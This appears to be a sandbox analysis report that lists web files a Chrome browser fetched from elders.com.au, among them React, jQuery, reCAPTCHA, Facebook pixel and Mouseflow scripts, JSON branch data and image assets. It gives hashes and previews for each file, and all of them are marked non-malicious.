                                                                                                                                                                                                            Preview:/**. * @license React. * react.development.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */.(function (global, factory) {. typeof exports === 'object' && typeof module !== 'undefined' ? factory(exports) :. typeof define === 'function' && define.amd ? define(['exports'], factory) :. (global = global || self, factory(global.React = {}));.}(this, (function (exports) { 'use strict';.. var ReactVersion = '18.3.1';.. // ATTENTION. // When adding new symbols to this file,. // Please consider also adding to 'react-devtools-shared/src/backend/ReactSymbols'. // The Symbol used to tag the ReactElement-like types.. var REACT_ELEMENT_TYPE = Symbol.for('react.element');. var REACT_PORTAL_TYPE = Symbol.for('react.portal');. var REACT_FRAGMENT_TYPE = Symbol.for('react.fragment');. var REACT_STRICT_MODE_TYPE = Symbol.for('react.strict_mode');. var RE
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (5552)
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):77539
                                                                                                                                                                                                            Entropy (8bit):5.320879390119302
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:RJeUwT76HXhpwPCHM9ZVK01QqSYTZ02LKVsdmpyKcicPl:RIT7OXVs9ZVKBvYj8wKcHPl
                                                                                                                                                                                                            MD5:17498360325E61C7C66CC6FBF120C83A
                                                                                                                                                                                                            SHA1:21F70F088F62213BE82B9A79B0EB379272076288
                                                                                                                                                                                                            SHA-256:3981A5BC7726C881BA01D63DBD2A15B0CD6B463D619ECF1A9DA1387C779FE436
                                                                                                                                                                                                            SHA-512:807E7D7F610D2F419C6F948DFC518B661DCF3ED56DD47D4D3F35CF7DF1EE5EDA32809638193D780B0B5D2AF9C4D63BDAADAADC96D4902FAC47ED642177686CF4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://connect.facebook.net/signals/config/1013340413305983?v=2.9.176&r=stable&domain=elders.com.au&hme=872f04a0547459b3285cb03b0d7a47bfde40628f4b386809918a621e2688602f&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113
                                                                                                                                                                                                            Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2485)
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):25607
                                                                                                                                                                                                            Entropy (8bit):5.299200052135676
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:so/MPtWU9YwUpxbY/Y3YOgQYeYZYHYZYVY+YSYMpR8ZkQuF0vLO+UXfSCK:RIT7sZwuvL54WAcl/7K
                                                                                                                                                                                                            MD5:48EA8373BD38CCB271F71561CCF70F1E
                                                                                                                                                                                                            SHA1:6379F6AFB2727113965D748DCAC52476DA087B12
                                                                                                                                                                                                            SHA-256:C2FBB1BE336052AA53329BA199C6845863B3AA6EC1F7F1C3BDD588A00658DEC4
                                                                                                                                                                                                            SHA-512:2830CF1EBC05645EDFB162BF55B36E2A3D8BD8F2E48048F07AD894DD25EA1890667FF08B2BD6DC73FF0614D7369E58C9B1F23626B02D3172A0AEA83424382D34
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (701)
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):558800
                                                                                                                                                                                                            Entropy (8bit):5.6661858145390775
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:HHe/N32Dr0RnSXaKyEtG76ZKj1wa89jzQoDjU3+VLs/k5lS64cflFT3O01d:eMapiBMKZxRflF3d
                                                                                                                                                                                                            MD5:88A5FED5C87B1D3704AB225CFBE7A130
                                                                                                                                                                                                            SHA1:D64243C18FBAA356E4ABAE8414CCC4772D64060B
                                                                                                                                                                                                            SHA-256:F8E5F5CE9FF44073CFF24BCD3D2B8AA4E67B67891B14FF929FE4743880FDF82E
                                                                                                                                                                                                            SHA-512:8B8D1C9F4C36FD2383C96D0D484A6692F70422934BCCD3DB1F0787E1B753F7D5A8F0C91934805C4D865AED3D4673FF478F0AE23746D0C0E005E60848543B3D33
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://www.gstatic.com/recaptcha/releases/-ZG7BC9TxCVEbzIO2m429usb/recaptcha__en.js
                                                                                                                                                                                                            Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var k=function(){return[function(n,S,D,d,Z,l,h,R,O){return(((n^53)&19)==((n&((((R=[34,2,46],n|72)==n&&(O=St(function(G,A,L){return L=(A=(G=function(f,H){return(f[(H=["replace","indexOf","trim"],H)[1]](d)!=-1&&(f=f.slice(f[H[1]](d))),f)[H[0]](/\s+/g,S)[H[0]](/\n/g,Z)[H[2]]()},G(Z+l)),G(Z+h)),A==L},D)),n)|56)==n&&(h=["https","",0],D=="*"?O="*":(d=g[R[2]](24,!0,h[1],new OI(D)),l=N[30](58,d,h[1]),Z=N[36](25,h[1],g[40](40,l,h[1]),v[21](R[1],1,S,D)),Z.D!=S||(Z.A==h[0]?E[30](90,h[R[1]],443,Z):Z.A=="http"&&.E[30](96,h[R[1]],80,Z)),O=Z.toString())),11))==n&&b.call(this,S),1)&&(O=x[42](16,C[42](44,v[R[0]](23,12),S),[u[20](3
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):291981
                                                                                                                                                                                                            Entropy (8bit):5.1014349996806985
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:LYUdwzo64+dguiv6jk5zb5Dp1p3vAKK8kOk9UTX261IK:LYUdwzo64+du6jk5z1Dp1eVOLT71IK
                                                                                                                                                                                                            MD5:E592021EAFD59DE123415AB937A09F08
                                                                                                                                                                                                            SHA1:95C6AA47BA749A69830B1D3918303835654F4D75
                                                                                                                                                                                                            SHA-256:9ADC4D1EFBC0737998D624B6168CF38F1A241E3D22898942C9C3654C460419CD
                                                                                                                                                                                                            SHA-512:A3128F9AEE8B298500A85C4AA6FF24CAEC11A6AE15A84F4E2B0A9BE999B4B5640DBE2B02696EDD485437ADE448BF4BD3E22980E1DD2C2B34C6587327A6D1EDFA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:/*******************************************************************************. * Copyright 2019 Adobe. *. * Licensed under the Apache License, Version 2.0 (the "License");. * you may not use this file except in compliance with the License.. * You may obtain a copy of the License at. *. * http://www.apache.org/licenses/LICENSE2.0. *. * Unless required by applicable law or agreed to in writing, software. * distributed under the License is distributed on an "AS IS" BASIS,. * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.. * See the License for the specific language governing permissions and. * limitations under the License.. ******************************************************************************/../**. * Element.matches(). * https://developer.mozilla.org/enUS/docs/Web/API/Element/matches#Polyfill. */.if (!Element.prototype.matches) {. Element.prototype.matches = Element.prototype.msMatchesSelector || Element.prototype.webkitMatchesSelector;.}..//
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):89501
                                                                                                                                                                                                            Entropy (8bit):5.289893677458563
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                                                                                            MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                                            SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                                            SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                                            SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):1711
                                                                                                                                                                                                            Entropy (8bit):5.320500352208174
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:TRM+RJvROtKHKUtKHvLNt4LNFmmUC2VWHh71Xfpc0224CVJKRxNli3yt3qyYUbtT:TpRJvRCcrc+mc28B7AR24DiQxc8yY
                                                                                                                                                                                                            MD5:829E847BC47EF3F21BA303841382841D
                                                                                                                                                                                                            SHA1:31B7C3B870F059E41327AB9A63B20C5AAD858E0C
                                                                                                                                                                                                            SHA-256:B6243FE566AEB3282DA93CF58425DF5C74FE72E259284BE4A7C398792BE1EBDF
                                                                                                                                                                                                            SHA-512:350DD2709FD6D5D5B32128BAE9C1760992A154CC2FD53FCAB7F173EAD1C7962A4481C0F30FD62E775D4AF58C5E75A82A164381F8254FAFAE6B48E8AA205C1A04
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://elders.com.au/bin/el/local-branch?branchId=1669702755463&type=default
                                                                                                                                                                                                            Preview:[{"id":"1669702755463","title":"Elders Adelaide","pagePath":"/our-services/our-branches/sa/elders-adelaide/","location":{"state":{"path":"/content/cq:tags/el/branch/locations/sa","title":"SA","id":"el:branch/locations/sa"},"city":{"path":"/content/cq:tags/el/branch/locations/sa/fleurieu-peninsula/elders-adelaide","title":"Adelaide","id":"el:branch/locations/sa/fleurieu-peninsula/elders-adelaide"},"googleProperties":{"placeId":"ChIJFRlDGSjPsGoR5gcvCu9E1WA","latitude":"-34.92389616095354","longitude":"138.60259665582404","embedUrl":"https://www.google.com/maps/embed?pb\u003d!1m18!1m12!1m3!1d3271.301151004918!2d138.60046118650763!3d-34.92398350209179!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x6ab0cf2819431915%3A0x60d544ef0a2f07e6!2sElders!5e0!3m2!1sen!2sau!4v1669702553968!5m2!1sen!2sau","getDirectionUrl":"https://goo.gl/maps/bBNFUxbFm24iPiek7","distance":0.0}},"phoneNumbers":[{"linkText":"(08) 8425 4000","linkUrl":"+61884254000"}],"fax":[{"linkText":"(08) 8425 4954","linkUrl":"+6
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2407
                                                                                                                                                                                                            Entropy (8bit):4.120800107455978
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:n/vg2rGKrPgxrL3XAeUKTkIw90vtRZpJmWkuFFB5i7AF2:ng2rGTrs9bB9qRqQ5wAF2
                                                                                                                                                                                                            MD5:81A61FA6DF91240A8C0DA8CFA1F205B7
                                                                                                                                                                                                            SHA1:4DDC78DF7F4C442C36A48ED13DE319CCD33EBCE2
                                                                                                                                                                                                            SHA-256:1DCBAB25EF09241FAABB74D0A891609A992CF8A4A51D4715FD8909EF490FB27B
                                                                                                                                                                                                            SHA-512:A4F8C7C6794CFE39004924E7A67B22044608818B2E28B7C5150748F0CB77F615279587616E9C2B8F343D256EB641A6EE4F68ADC9E447AEE99BA04763F1C6A993
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">.<path fill-rule="evenodd" clip-rule="evenodd" d="M9 7.5C9 7.36739 9.05268 7.24021 9.14645 7.14645C9.24021 7.05268 9.36739 7 9.5 7H17.5C17.6326 7 17.7598 7.05268 17.8536 7.14645C17.9473 7.24021 18 7.36739 18 7.5V16.5C18 16.6326 17.9473 16.7598 17.8536 16.8536C17.7598 16.9473 17.6326 17 17.5 17H9.5C9.36739 17 9.24021 16.9473 9.14645 16.8536C9.05268 16.7598 9 16.6326 9 16.5V14.5C9 14.3674 8.94732 14.2402 8.85355 14.1464C8.75979 14.0527 8.63261 14 8.5 14C8.36739 14 8.24021 14.0527 8.14645 14.1464C8.05268 14.2402 8 14.3674 8 14.5V16.5C8 16.8978 8.15804 17.2794 8.43934 17.5607C8.72064 17.842 9.10218 18 9.5 18H17.5C17.8978 18 18.2794 17.842 18.5607 17.5607C18.842 17.2794 19 16.8978 19 16.5V7.5C19 7.10218 18.842 6.72064 18.5607 6.43934C18.2794 6.15804 17.8978 6 17.5 6H9.5C9.10218 6 8.72064 6.15804 8.43934 6.43934C8.15804 6.72064 8 7.10218 8 7.5V9.5C8 9.63261 8.05268 9.75979 8.14645 9.85355C8.24021 9
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):772
                                                                                                                                                                                                            Entropy (8bit):4.3966498802641985
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:twdoqAulEVIO4Rh6cPWgm0R/4XcYRVdL56I7sF0S:6mqaVIOy86IAiS
                                                                                                                                                                                                            MD5:198206BDD32C90F5DE0D10D91FD81833
                                                                                                                                                                                                            SHA1:B611164EF07C0F87EE85823EC554D32540B39C08
                                                                                                                                                                                                            SHA-256:A9674747820E8FE27D55C02996B53ABEBEC5059D5D3B1EFECC6206C46C80E87B
                                                                                                                                                                                                            SHA-512:48F5AB95C937ACF7ABBE9DA03EF2E582A037A919A1AE88C7387F84C0DECD629273A0E06039F0B1CE978F021619027CAF093E796E88F4906F109BA59244C92D30
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-magnifier.svg
                                                                                                                                                                                                            Preview:<svg width="20" height="21" viewBox="0 0 20 21" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M19.0007 19.9998L12.0967 13.0958M12.0967 13.0958C12.7094 12.4942 13.1969 11.7773 13.5309 10.9863C13.8649 10.1953 14.039 9.346 14.0429 8.48739C14.0468 7.62878 13.8806 6.77789 13.5539 5.98388C13.2271 5.18987 12.7463 4.46846 12.1392 3.86133C11.532 3.25419 10.8106 2.77336 10.0166 2.4466C9.2226 2.11985 8.37171 1.95364 7.5131 1.95759C6.65449 1.96153 5.80517 2.13555 5.0142 2.46959C4.22322 2.80363 3.50626 3.29107 2.90473 3.90376C1.70425 5.12651 1.03516 6.77384 1.04304 8.48739C1.05091 10.2009 1.73511 11.842 2.94677 13.0537C4.15844 14.2654 5.79956 14.9496 7.5131 14.9575C9.22664 14.9653 10.874 14.2962 12.0967 13.0958V13.0958Z" stroke="#3D3E42" stroke-width="2"/>.</svg>.
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:PNG image data, 152 x 66, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2918
                                                                                                                                                                                                            Entropy (8bit):7.907716853116308
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:g/6on79OskwFLow7j3R2/wsq90BcZzPnwbD5R4ilCJHd3zXS0dtd+jzOcLnd:gSLstFEwn0/xqqBctobQiUHd3zXSg+jn
                                                                                                                                                                                                            MD5:AED2CCE0BEA27C8E648B826838FF36DB
                                                                                                                                                                                                            SHA1:2D7713543D84113EBEA24D61653224560A9DF1E2
                                                                                                                                                                                                            SHA-256:748181DAB74B0ED8BA83CE218F97B0F1B325C2C61560C5CB8AE76EE26DEAC339
                                                                                                                                                                                                            SHA-512:A4D2E71883E22331A7B3C5EC4883C6E311D63854F2A11A5CA76667F9C51DC826F9A48F2834D2ABB5C4FE5181A7807319B474EDD1ED34C35D2DEDA3154FA715B0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:.PNG........IHDR.......B......g.h....pHYs.................sRGB.........gAMA......a.....IDATx..m.\....l.mR.}i.H.Mw.".._4.....-..F.*..*XP..-...b.Ei...]!.E.4.C.......|qcPL..fU..l.a...9.;...2..nv..fgg.......s....|..zy..<..C|...B.p..fA.#...<.X,...>..J%........u_..;V....h..L0!W.<}t.ww./.....@.~..j......H..vJ......~...u..'.`..l.....'o.Q..Y`..........uO.._98d....j.Xl......?...r..&...#...r.#.C.p.s...`.....!W|O].hjY....T.w.8..f.f5..Jnk.....$j.$T..6....,z......x.$.w....C.1..v...u7..;n.$S..ld....o.~_r...Z..YC0......H.p.c....b......B.Sj.z.0.......E.eI;U...7....%...PW?......C...y.R.x|....*.......T....O?...~ j..;.Vs.3F.4..pG.M.UW..hm...=K$....'...P..(.';.....|...Z....W...K.E.......\..t....?"*....M2.. l.F.......Q...k......5..\.doO7.a..Q.B.Mfl.EK.g.....\E......~0..z`#..)r}.gn.F.......y.....Xr.....N..U+..O....dG9..k.R..3....Y..fR...@..0..M.o^..!.h8...........&...!W..&....ym....75..p#....^...r..wT.........%yLy.s..k.\6r..E......j....c.0~!I.5H.;,...o~gL.m...D.
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):72130
                                                                                                                                                                                                            Entropy (8bit):5.606238239604008
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:bfu0/93VQ/kdM5WoSwQCV7nh7lI2ibrrc6uFYk/xIDJCOqmqM1AmLMF4Ld2wPECS:Tu0/93QWFZyptL
                                                                                                                                                                                                            MD5:91D20120E7FE55850F031200600F53AE
                                                                                                                                                                                                            SHA1:93E3313248FF84E43025EB243AE964AF730A0BC3
                                                                                                                                                                                                            SHA-256:9F46BB6E66AFE1B40CC7E1FB7DE4A38E5D6FB27C4BDA7B986B0469817055A299
                                                                                                                                                                                                            SHA-512:7E2219E7438984160733B0B01711373596C4D483AFA78742BC21D24EF71D051F0B72B97BCEB37DBC976907797B6E900241ECD2D01EEA61BD2C7FFCCABC256325
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://cdn.mouseflow.com/projects/b953cf15-e568-418d-a9cb-1ea0cf6357a5.js
                                                                                                                                                                                                            Preview:var mouseflowDisableKeyLogging = true;if(typeof mouseflow==='undefined'&&typeof mouseflowPlayback==='undefined'){(function(){var _204=false;var _193=false;var _200=[];var _196=[];var _20='https://us.mouseflow.com';function _7(_341,_151){_151=(typeof _151!=='undefined'?_151:'');if(_4.debug)console.log('MF'+(_4.includeDebugTime?' - '+_151:'')+': '+_341)}var _60=new _397(window);var _34=new _376(window);var _5=new _383(window,Math,JSON,_60);var _13=new _372(_60,_5);var _36=new _285('local',window,_5,_7);var _304=new _285('session',window,_5,_7);var _276=new _336(window);var _4=new _359(window,_36,_204,_193);_4._100();_4._208=[];_4._174=[];_4._117=[];_4._173=[];_4._419=[];_4._418=[];_4._71='b953cf15-e568-418d-a9cb-1ea0cf6357a5';_4._417=true;_4._416=false;_4._415='5242000';_4._161('appUrl',_20);var _295=new _342(window,_5,_4,_7);function _305(_0,_4,_53,_5,_13,_76,_36){var _20,_71,_7,_56;var _194='mf_liveHeatmaps';var _15;var _119=[];var _89;var _137=false;function _46(_164,_122,_176,_112){_
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):1226
                                                                                                                                                                                                            Entropy (8bit):4.647801139486787
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:tYU/dutm7ivbWXQ8N4+2NGqRB7tFHPbUla35cFsJcrEKHb:n/TWvaqR5fHTYa35cua
                                                                                                                                                                                                            MD5:5FEF43A945FA6C8242FC795D0C8DDC9D
                                                                                                                                                                                                            SHA1:752A33F4C5B89F7E2C02B5A8EE5EF6089924C392
                                                                                                                                                                                                            SHA-256:911E4F035C61ADBB2CDCE5A5C1DAAB5763DFB6C5A1880A0EEA308741CA2126C5
                                                                                                                                                                                                            SHA-512:9A4D4A6E2ED578437626727DC6231D781507103AC22F8B994A906DBFC46B30AF784B7C37DD1238FFA01122728E699DDCC56932B6436C120ED0C4231D6647AACE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-cart.svg
                                                                                                                                                                                                            Preview:<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_8407_13472)">.<path d="M7.5 22.5C8.32843 22.5 9 21.8284 9 21C9 20.1716 8.32843 19.5 7.5 19.5C6.67157 19.5 6 20.1716 6 21C6 21.8284 6.67157 22.5 7.5 22.5Z" fill="#2A2B2D"/>.<path d="M18 22.5C18.8284 22.5 19.5 21.8284 19.5 21C19.5 20.1716 18.8284 19.5 18 19.5C17.1716 19.5 16.5 20.1716 16.5 21C16.5 21.8284 17.1716 22.5 18 22.5Z" fill="#2A2B2D"/>.<path d="M21 5.24991H4.365L3.75 2.09991C3.71494 1.92795 3.62068 1.77374 3.48364 1.6641C3.3466 1.55447 3.17546 1.49637 3 1.49991H0V2.99991H2.385L5.25 17.3999C5.28506 17.5719 5.37932 17.7261 5.51636 17.8357C5.6534 17.9453 5.82454 18.0034 6 17.9999H19.5V16.4999H6.615L6 13.4999H19.5C19.6734 13.5041 19.8429 13.4482 19.9796 13.3415C20.1163 13.2348 20.2119 13.0841 20.25 12.9149L21.75 6.16491C21.7751 6.05363 21.7745 5.93808 21.7483 5.82706C21.722 5.71604 21.6708 5.61247 21.5985 5.52424C21.5261 5.436 21.4347 5.36543 21.3309 5.3179C21.227
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:PNG image data, 600 x 400, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):292817
                                                                                                                                                                                                            Entropy (8bit):7.991435801139438
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:6144:7pKYu/kHxtd4lfDFI5srU+JBM7kEEgmXTdr6:Oaxj4/QfEg2+
                                                                                                                                                                                                            MD5:9A5F5905DB03C7F0FEDA9C9651464F24
                                                                                                                                                                                                            SHA1:EFB3B37FF24DE6CC134E203D4BBA44DDED701E6D
                                                                                                                                                                                                            SHA-256:F5C133FE3DD199E54EAEF091900E0471B0C940DC70434235E45D2CF2A4DE9094
                                                                                                                                                                                                            SHA-512:CA37B79B64F1DC3A03DED9DE406AF15604A3B95A8A58C3755F3EA2FF5CEEFD833D888D1A37FD75E5393921C459CED026D8B8ADBE55DE6B0DF5DCE669E612DDB8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://elders.com.au/content/dam/eld/images/livestocknow/close_up_ram_head_horns.png
                                                                                                                                                                                                            Preview:.PNG........IHDR...X.........r5......pHYs..........+....."iTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x='adobe:ns:meta/'>. <rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>.. <rdf:Description rdf:about=''. xmlns:dc='http://purl.org/dc/elements/1.1/'>. <dc:title>. <rdf:Alt>. <rdf:li xml:lang='x-default'>Copy of ELD2024_livestockNow_landingpage-images-template.psd - 11</rdf:li>. </rdf:Alt>. </dc:title>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:Attrib='http://ns.attribution.com/ads/1.0/'>. <Attrib:Ads>. <rdf:Seq>. <rdf:li rdf:parseType='Resource'>. <Attrib:Created>2024-09-02</Attrib:Created>. <Attrib:ExtId>c6b7f448-340c-4f65-b35f-83bbe5a978b7</Attrib:ExtId>. <Attrib:FbId>525265914179580</Attrib:FbId>. <Attrib:TouchType>2</Attrib:TouchType>. </rdf:li>. </rdf:Seq>. </Attrib:Ads>. </rdf:Description>..
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                                                            Entropy (8bit):4.112050682122861
